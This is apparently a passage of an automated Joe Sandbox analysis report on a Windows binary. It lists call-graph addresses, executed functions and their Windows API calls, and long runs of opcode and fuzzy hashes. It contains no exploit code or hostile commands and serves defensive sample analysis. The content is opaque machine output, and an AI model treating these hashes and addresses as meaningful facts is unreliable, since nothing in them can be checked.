77175->77176 77177 7ff73ae8894c memcpy_s 77176->77177 77177->77167 77179 7ff73ae6b28a 77178->77179 77186 7ff73ae83ed0 77179->77186 77181 7ff73ae6b29e 77189 7ff73ae827e0 77181->77189 77183 7ff73ae6b2a8 77185 7ff73ae6b39c 77183->77185 77193 7ff73ae88ad0 77183->77193 77185->77166 77197 7ff73aeba990 77186->77197 77188 7ff73ae83ef3 77188->77181 77190 7ff73ae82802 77189->77190 77192 7ff73ae8280c 77189->77192 77202 7ff73aeb7300 VirtualFree 77190->77202 77192->77183 77194 7ff73ae88af3 77193->77194 77195 7ff73ae88b35 77194->77195 77196 7ff73ae88c90 4 API calls 77194->77196 77195->77185 77196->77194 77198 7ff73aeba9ca 77197->77198 77199 7ff73aebaa0d 77198->77199 77201 7ff73aebada0 VirtualFree 77198->77201 77199->77188 77201->77198 77202->77192 77204 7ff73ae8e2f6 77203->77204 77205 7ff73ae8e33e 77203->77205 77209 7ff73ae8e6e0 WaitForSingleObject DeleteCriticalSection 77204->77209 77205->77158 77207 7ff73ae8e300 77210 7ff73ae83bb0 74 API calls 3 library calls 77207->77210 77209->77207 77210->77205 77211 7ff73ae64a01 77212 7ff73ae64a0c 77211->77212 77213 7ff73ae64a30 77211->77213 77212->77213 77215 7ff73ae72dc0 77212->77215 77216 7ff73af2aef8 _get_daylight 14 API calls 77215->77216 77217 7ff73ae72dd3 GetLastError 77216->77217 77218 7ff73ae72e77 77217->77218 77219 7ff73ae72ee6 77218->77219 77220 7ff73ae83fc0 94 API calls 77218->77220 77221 7ff73ae72f35 wcsxfrm 77219->77221 77229 7ff73ae73a80 19 API calls _handle_error 77219->77229 77220->77219 77227 7ff73ae73005 77221->77227 77230 7ff73ae73a80 19 API calls _handle_error 77221->77230 77222 7ff73ae73074 77224 7ff73af2aef8 _get_daylight 14 API calls 77222->77224 77225 7ff73ae73079 SetLastError 77224->77225 77225->77213 77227->77222 77231 7ff73ae73a80 19 API calls _handle_error 77227->77231 77229->77221 77230->77227 77231->77222 77232 7ff73ae61a21 77235 7ff73ae7fd90 77232->77235 77234 7ff73ae61a47 77237 7ff73ae7fdb8 77235->77237 77236 7ff73ae7ff71 strrchr _mbsncpy_s 77236->77234 77237->77236 77238 7ff73ae7feb0 wcsxfrm 77237->77238 77242 7ff73ae802a6 77237->77242 77255 7ff73ae7f2a0 77237->77255 77259 7ff73ae7f2f0 77237->77259 77263 7ff73ae70950 15 API calls strrchr 77237->77263 77238->77236 77262 7ff73ae70a70 15 API calls 2 library calls 77238->77262 77243 7ff73ae802fd 77242->77243 77244 7ff73ae802b7 77242->77244 77247 7ff73ae8037d 77243->77247 77251 7ff73ae80333 77243->77251 77264 7ff73ae9e9c0 15 API calls 77244->77264 77248 7ff73ae80396 77247->77248 77249 7ff73ae80383 77247->77249 77267 7ff73aeb2fe0 15 API calls type_info::_name_internal_method 77248->77267 77266 7ff73ae91a40 15 API calls 2 library calls 77249->77266 77250 7ff73ae802f8 77250->77234 77265 7ff73ae9e9c0 15 API calls 77251->77265 77256 7ff73ae7f2d5 77255->77256 77257 7ff73ae7f2c7 77255->77257 77256->77237 77268 7ff73ae9e3f0 15 API calls 3 library calls 77257->77268 77260 7ff73ae7b7a0 type_info::_name_internal_method 15 API calls 77259->77260 77261 7ff73ae7f32a 77260->77261 77261->77237 77262->77236 77263->77237 77264->77250 77265->77250 77266->77250 77267->77250 77268->77256

                                                      Executed Functions

                                                      Function 00007FF73AF41E0C Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7ff73af41e0c-7ff73af41e7f call 7ff73af419f0 3 7ff73af41e99-7ff73af41ea3 call 7ff73af479a0 0->3 4 7ff73af41e81-7ff73af41e8a call 7ff73af2aed8 0->4 10 7ff73af41ebe-7ff73af41f27 CreateFileW 3->10 11 7ff73af41ea5-7ff73af41ebc call 7ff73af2aed8 call 7ff73af2aef8 3->11 9 7ff73af41e8d-7ff73af41e94 call 7ff73af2aef8 4->9 24 7ff73af421d2-7ff73af421f2 9->24 12 7ff73af41f29-7ff73af41f2f 10->12 13 7ff73af41fa4-7ff73af41faf GetFileType 10->13 11->9 16 7ff73af41f71-7ff73af41f9f GetLastError call 7ff73af2ae88 12->16 17 7ff73af41f31-7ff73af41f35 12->17 19 7ff73af42002-7ff73af42009 13->19 20 7ff73af41fb1-7ff73af41fec GetLastError call 7ff73af2ae88 CloseHandle 13->20 16->9 17->16 22 7ff73af41f37-7ff73af41f6f CreateFileW 17->22 27 7ff73af4200b-7ff73af4200f 19->27 28 7ff73af42011-7ff73af42014 19->28 20->9 35 7ff73af41ff2-7ff73af41ffd call 7ff73af2aef8 20->35 22->13 22->16 29 7ff73af4201a-7ff73af4206b call 7ff73af478b8 27->29 28->29 30 7ff73af42016 28->30 38 7ff73af4208a-7ff73af420ba call 7ff73af4175c 29->38 39 7ff73af4206d-7ff73af42079 call 7ff73af41bfc 29->39 30->29 35->9 46 7ff73af4207d-7ff73af42085 call 7ff73af3d5d8 38->46 47 7ff73af420bc-7ff73af420ff 38->47 39->38 45 7ff73af4207b 39->45 45->46 46->24 49 7ff73af42121-7ff73af4212c 47->49 50 7ff73af42101-7ff73af42105 47->50 52 7ff73af42132-7ff73af42136 49->52 53 7ff73af421d0 49->53 50->49 51 7ff73af42107-7ff73af4211c 50->51 51->49 52->53 55 7ff73af4213c-7ff73af42181 CloseHandle CreateFileW 52->55 53->24 56 7ff73af421b6-7ff73af421cb 55->56 57 7ff73af42183-7ff73af421b1 GetLastError call 7ff73af2ae88 call 7ff73af47ae0 55->57 56->53 57->56
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                      • String ID:
                                                      • API String ID: 1330151763-0
                                                      • Opcode ID: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                      • Instruction ID: 70534de4fc876353f1611dd9d54a63cd4a4389e0c42a2d0eb3fd458fc1b6d6ae
                                                      • Opcode Fuzzy Hash: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                      • Instruction Fuzzy Hash: 24C1D03BB24A5295FB14EF69C4816ACB761FB48B98B900375DE2E97794CF38E052D310
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3E1DC Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 62 7ff73af3e1dc-7ff73af3e202 63 7ff73af3e21d-7ff73af3e221 62->63 64 7ff73af3e204-7ff73af3e218 call 7ff73af2aed8 call 7ff73af2aef8 62->64 66 7ff73af3e227-7ff73af3e22e 63->66 67 7ff73af3e600-7ff73af3e60c call 7ff73af2aed8 call 7ff73af2aef8 63->67 82 7ff73af3e617 64->82 66->67 70 7ff73af3e234-7ff73af3e266 66->70 84 7ff73af3e612 call 7ff73af38b14 67->84 70->67 71 7ff73af3e26c-7ff73af3e273 70->71 74 7ff73af3e28c-7ff73af3e28f 71->74 75 7ff73af3e275-7ff73af3e287 call 7ff73af2aed8 call 7ff73af2aef8 71->75 80 7ff73af3e5fc-7ff73af3e5fe 74->80 81 7ff73af3e295-7ff73af3e297 74->81 75->84 85 7ff73af3e61a-7ff73af3e631 80->85 81->80 86 7ff73af3e29d-7ff73af3e2a0 81->86 82->85 84->82 86->75 89 7ff73af3e2a2-7ff73af3e2c8 86->89 91 7ff73af3e2ca-7ff73af3e2cd 89->91 92 7ff73af3e307-7ff73af3e30f 89->92 95 7ff73af3e2cf-7ff73af3e2d7 91->95 96 7ff73af3e2f5-7ff73af3e302 91->96 93 7ff73af3e2d9-7ff73af3e2f0 call 7ff73af2aed8 call 7ff73af2aef8 call 7ff73af38b14 92->93 94 7ff73af3e311-7ff73af3e339 call 7ff73af3a290 call 7ff73af39294 * 2 92->94 123 7ff73af3e490 93->123 125 7ff73af3e33b-7ff73af3e351 call 7ff73af2aef8 call 7ff73af2aed8 94->125 126 7ff73af3e356-7ff73af3e387 call 7ff73af40728 94->126 95->93 95->96 97 7ff73af3e38b-7ff73af3e39e 96->97 100 7ff73af3e41a-7ff73af3e424 call 7ff73af2a548 97->100 101 7ff73af3e3a0-7ff73af3e3a8 97->101 112 7ff73af3e42a-7ff73af3e43f 100->112 113 7ff73af3e4ae 100->113 101->100 104 7ff73af3e3aa-7ff73af3e3ac 101->104 104->100 110 7ff73af3e3ae-7ff73af3e3c5 104->110 110->100 115 7ff73af3e3c7-7ff73af3e3d3 110->115 112->113 117 7ff73af3e441-7ff73af3e453 GetConsoleMode 112->117 121 7ff73af3e4b3-7ff73af3e4d3 ReadFile 113->121 115->100 119 7ff73af3e3d5-7ff73af3e3d7 115->119 117->113 122 7ff73af3e455-7ff73af3e45d 117->122 119->100 124 7ff73af3e3d9-7ff73af3e3f1 119->124 127 7ff73af3e4d9-7ff73af3e4e1 121->127 128 7ff73af3e5c6-7ff73af3e5cf GetLastError 121->128 122->121 131 7ff73af3e45f-7ff73af3e481 ReadConsoleW 122->131 134 7ff73af3e493-7ff73af3e49d call 7ff73af39294 123->134 124->100 135 7ff73af3e3f3-7ff73af3e3ff 124->135 125->123 126->97 127->128 129 7ff73af3e4e7 127->129 132 7ff73af3e5ec-7ff73af3e5ef 128->132 133 7ff73af3e5d1-7ff73af3e5e7 call 7ff73af2aef8 call 7ff73af2aed8 128->133 137 7ff73af3e4ee-7ff73af3e503 129->137 139 7ff73af3e4a2-7ff73af3e4ac 131->139 140 7ff73af3e483 GetLastError 131->140 144 7ff73af3e489-7ff73af3e48b call 7ff73af2ae88 132->144 145 7ff73af3e5f5-7ff73af3e5f7 132->145 133->123 134->85 135->100 143 7ff73af3e401-7ff73af3e403 135->143 137->134 147 7ff73af3e505-7ff73af3e510 137->147 139->137 140->144 143->100 151 7ff73af3e405-7ff73af3e415 143->151 144->123 145->134 154 7ff73af3e537-7ff73af3e53f 147->154 155 7ff73af3e512-7ff73af3e52b call 7ff73af3dda0 147->155 151->100 158 7ff73af3e541-7ff73af3e553 154->158 159 7ff73af3e5b4-7ff73af3e5c1 call 7ff73af3db58 154->159 162 7ff73af3e530-7ff73af3e532 155->162 163 7ff73af3e5a7-7ff73af3e5af 158->163 164 7ff73af3e555 158->164 159->162 162->134 163->134 166 7ff73af3e55a-7ff73af3e561 164->166 167 7ff73af3e59d-7ff73af3e5a1 166->167 168 7ff73af3e563-7ff73af3e567 166->168 167->163 169 7ff73af3e569-7ff73af3e570 168->169 170 7ff73af3e583 168->170 169->170 171 7ff73af3e572-7ff73af3e576 169->171 172 7ff73af3e589-7ff73af3e599 170->172 171->170 174 7ff73af3e578-7ff73af3e581 171->174 172->166 173 7ff73af3e59b 172->173 173->163 174->172
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 5fe27b08ee4b6b8f0378e8def081a4c84f0191f5120a80ca269d4310bc11da16
                                                      • Instruction ID: ce2af2650a1664d2f31728a3109fa4838ba4dc7415b5c5d7c14e4fa46aafb830
                                                      • Opcode Fuzzy Hash: 5fe27b08ee4b6b8f0378e8def081a4c84f0191f5120a80ca269d4310bc11da16
                                                      • Instruction Fuzzy Hash: C2C1D22AE08A87B5FB607B15D0022BDEB91EF85B88FC44271D94D437D1DE7EE455A320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE7F8B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 166stringCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 175 7ff73ae7f8b0-7ff73ae7f8dc 177 7ff73ae7f8e2-7ff73ae7f8f4 175->177 178 7ff73ae7fbd0-7ff73ae7fbe2 call 7ff73ae70950 175->178 179 7ff73ae7fb0b-7ff73ae7fb34 call 7ff73ae7f4a0 177->179 180 7ff73ae7f8fa-7ff73ae7f93f call 7ff73ae7d090 177->180 186 7ff73ae7fbe4-7ff73ae7fbe8 178->186 190 7ff73ae7fb58-7ff73ae7fb67 179->190 191 7ff73ae7fb36-7ff73ae7fb53 call 7ff73ae70a70 179->191 188 7ff73ae7f941-7ff73ae7f958 180->188 189 7ff73ae7f97f-7ff73ae7f989 180->189 192 7ff73ae7f95a-7ff73ae7f96b call 7ff73ae7f1d0 188->192 193 7ff73ae7f970-7ff73ae7f975 188->193 197 7ff73ae7f98b-7ff73ae7f994 189->197 198 7ff73ae7f996-7ff73ae7f9a8 189->198 194 7ff73ae7fb69-7ff73ae7fba5 call 7ff73ae81360 190->194 195 7ff73ae7fba7-7ff73ae7fbc3 call 7ff73ae7f180 190->195 191->186 191->190 192->193 193->186 194->186 195->178 203 7ff73ae7f9f7-7ff73ae7fa07 197->203 204 7ff73ae7f9aa-7ff73ae7f9b3 198->204 205 7ff73ae7f9b5-7ff73ae7f9e8 call 7ff73ae7f420 198->205 209 7ff73ae7fa0d-7ff73ae7fa24 203->209 210 7ff73ae7fb09 203->210 206 7ff73ae7f9ed-7ff73ae7f9f2 204->206 205->206 206->203 213 7ff73ae7fa3c-7ff73ae7fa53 209->213 214 7ff73ae7fa26-7ff73ae7fa37 call 7ff73ae7f1d0 209->214 210->190 216 7ff73ae7fa55-7ff73ae7fa5a 213->216 217 7ff73ae7fa5f-7ff73ae7fa6b 213->217 214->213 216->186 218 7ff73ae7fa6d-7ff73ae7fa7f call 7ff73ae70950 217->218 219 7ff73ae7fa81-7ff73ae7fa85 217->219 223 7ff73ae7faea-7ff73ae7faff call 7ff73ae7d290 218->223 221 7ff73ae7faa8-7ff73ae7faba 219->221 222 7ff73ae7fa87-7ff73ae7faa6 219->222 221->223 224 7ff73ae7fabc-7ff73ae7fad4 221->224 222->223 230 7ff73ae7fb04 223->230 226 7ff73ae7fad8-7ff73ae7fae5 call 7ff73ae70950 224->226 227 7ff73ae7fad6 224->227 226->223 227->223 227->226 230->186 230->210
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: strrchr
                                                      • String ID: d
                                                      • API String ID: 3418686817-2564639436
                                                      • Opcode ID: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                      • Instruction ID: dbd34f3db3d1e7492c3663ace13e1b944cd3a7a5717cc5bfbb7cff03a305faea
                                                      • Opcode Fuzzy Hash: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                      • Instruction Fuzzy Hash: E391712A61CBC591EA60AB15E45236EE760F7C4BA0F504272DAED87BE8DF3DD440DB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF39BF4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: String$try_get_function
                                                      • String ID: LCMapStringEx
                                                      • API String ID: 1203122356-3893581201
                                                      • Opcode ID: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                      • Instruction ID: 1e54a895fd16118936024085076e2630df1b3a8e1e56ded5e22bdc04b7b51c9a
                                                      • Opcode Fuzzy Hash: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                      • Instruction Fuzzy Hash: 11115E75A08B8286EB60DB56F4812AAB7A0F7C9BC0F444136EECD83B58CF3CD5458B40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE86950 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: AddressCallerLibraryLoadProc
                                                      • String ID: SystemFunction036$advapi32.dll
                                                      • API String ID: 4215043672-1354007664
                                                      • Opcode ID: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                      • Instruction ID: 96ccaf6a01cf157fbf5e39ad3b929e68aff79ee0ea0dc8dde0e31020ed3e503a
                                                      • Opcode Fuzzy Hash: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                      • Instruction Fuzzy Hash: 80115229D5CA8BB1FB50BB10E847336E3A4FB80784FD041B5D54E422D4DF7DE454A621
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEEF000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00007FF73AEEEDD3), ref: 00007FF73AEEF013
                                                      • LoadLibraryExA.KERNELBASE(?,?,?,?,?,?,00007FF73AEEEDD3), ref: 00007FF73AEEF034
                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73AEB17E7), ref: 00007FF73AEEF061
                                                        • Part of subcall function 00007FF73AEEEE80: GetLastError.KERNEL32 ref: 00007FF73AEEEE96
                                                        • Part of subcall function 00007FF73AEEEE80: FormatMessageA.KERNEL32 ref: 00007FF73AEEEECA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$FormatLibraryLoadMessage
                                                      • String ID: cannot load module '%s': %s
                                                      • API String ID: 3853237079-2554058836
                                                      • Opcode ID: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                      • Instruction ID: 50c6fb282de7eb7a7ae6f8e2666df2d7ec99b6ff63ed64ff67a2d93d9f877da0
                                                      • Opcode Fuzzy Hash: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                      • Instruction Fuzzy Hash: 3EF0197A918A8292EB20FB15F44222AB7B0FBC97D4F900175EA8D03A38CF3DD554CB14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF0D4E4 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                      • String ID:
                                                      • API String ID: 1452418845-0
                                                      • Opcode ID: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                      • Instruction ID: 27e4c3f1b5979e6f88a0b3fd7c24b47f0e17a453b12738ab216ce1c8cd8b0f1c
                                                      • Opcode Fuzzy Hash: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                      • Instruction Fuzzy Hash: 49314B29E0D20376FB54FB6498233B9A2919F41384FC446B8E94E4B2D3DE2DF404A232
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE88C90 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$QueryVirtual
                                                      • String ID:
                                                      • API String ID: 3696288210-0
                                                      • Opcode ID: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                      • Instruction ID: 4d40d9f09b1e8722a67d8df26f0ccf100e82f8731baa8afda770fda1776b3805
                                                      • Opcode Fuzzy Hash: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                      • Instruction Fuzzy Hash: A021582665DE8191FA70BB15E442229E7F8FB98BD4F500275EA8D827F8DF3CD5409B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE7FD90 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 370COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 333 7ff73ae7fd90-7ff73ae7fdb6 334 7ff73ae7fdb8-7ff73ae7fdc8 333->334 335 7ff73ae7fdd0-7ff73ae7fde2 333->335 334->335 336 7ff73ae7fe3c-7ff73ae7fe4f 335->336 337 7ff73ae7fde4-7ff73ae7fdf6 335->337 338 7ff73ae8004b-7ff73ae80067 336->338 339 7ff73ae7fe55-7ff73ae7fe68 336->339 337->336 340 7ff73ae7fdf8-7ff73ae7fdfd 337->340 344 7ff73ae8008a-7ff73ae8008f 338->344 345 7ff73ae80069-7ff73ae80085 338->345 339->338 343 7ff73ae7fe6e-7ff73ae7fe73 339->343 341 7ff73ae7fe03-7ff73ae7fe15 340->341 342 7ff73ae7feb0-7ff73ae7fee0 call 7ff73ae7f4a0 340->342 341->342 346 7ff73ae7fe1b-7ff73ae7fe3a 341->346 360 7ff73ae7ff78-7ff73ae80000 call 7ff73ae7f180 * 3 342->360 361 7ff73ae7fee6-7ff73ae7ff0f call 7ff73ae7f4a0 342->361 343->342 347 7ff73ae7fe75-7ff73ae7fe88 343->347 350 7ff73ae800fb 344->350 351 7ff73ae80091-7ff73ae800a0 344->351 349 7ff73ae8010b-7ff73ae8010f 345->349 346->336 346->342 347->342 355 7ff73ae7fe8a-7ff73ae7feaa 347->355 354 7ff73ae80114-7ff73ae80131 349->354 353 7ff73ae80103-7ff73ae80107 350->353 351->350 352 7ff73ae800a2-7ff73ae800be 351->352 352->350 357 7ff73ae800c0-7ff73ae800f9 352->357 353->349 358 7ff73ae80154-7ff73ae80159 354->358 359 7ff73ae80133-7ff73ae8014f 354->359 355->338 